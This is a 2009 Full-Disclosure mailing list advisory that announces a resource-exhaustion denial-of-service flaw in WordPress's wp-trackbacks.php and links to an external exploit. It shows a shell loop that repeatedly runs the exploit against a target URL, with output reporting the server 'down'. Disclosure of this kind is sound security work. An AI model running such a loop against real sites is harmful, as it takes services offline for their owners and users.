
Mailing List Archive: Full Disclosure: Full-Disclosure

[Wordpress] Resource Exhaustion (Denial of Service)

 

 



fernando at zerial

Oct 19, 2009, 4:51 AM


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

jcarlosn [http://rooibo.wordpress.com/] has discovered a Denial of
Service by Resource Exhaustion in all WordPress versions.
This vulnerability affects the wp-trackbacks.php file, and an exploit
for it is already available.

The exploit: http://codes.zerial.org/php/wp-trackbacks_dos.phps

Execution:

$ while /bin/true; do php test.php http://target.bom/wordpress; done
hit!
hit!
hit!
hit!
hit!
hit!
hit!
hit!
hit!
hit!

Notice: fputs(): send of 8192 bytes failed with errno=11 Resource
temporarily unavailable

down!!

Load average: 22.07, 15.18, 8.58 (on target server)

- --
Fernando A. Lagos Berardi - Zerial
Web Developer and Programmer
Information Security
Linux User #382319
Blog: http://blog.zerial.org
Skype: erzerial
Jabber: zerial [at] jabberes
GTalk && MSN: fernando [at] zerial

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkrcUsIACgkQIP17Kywx9JQnNQCeOwPir0lZxguy8d4LDmNzKxD8
CyYAoJEEAaoyOnE09VbVRveUQU7Uapcq
=pFaY
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
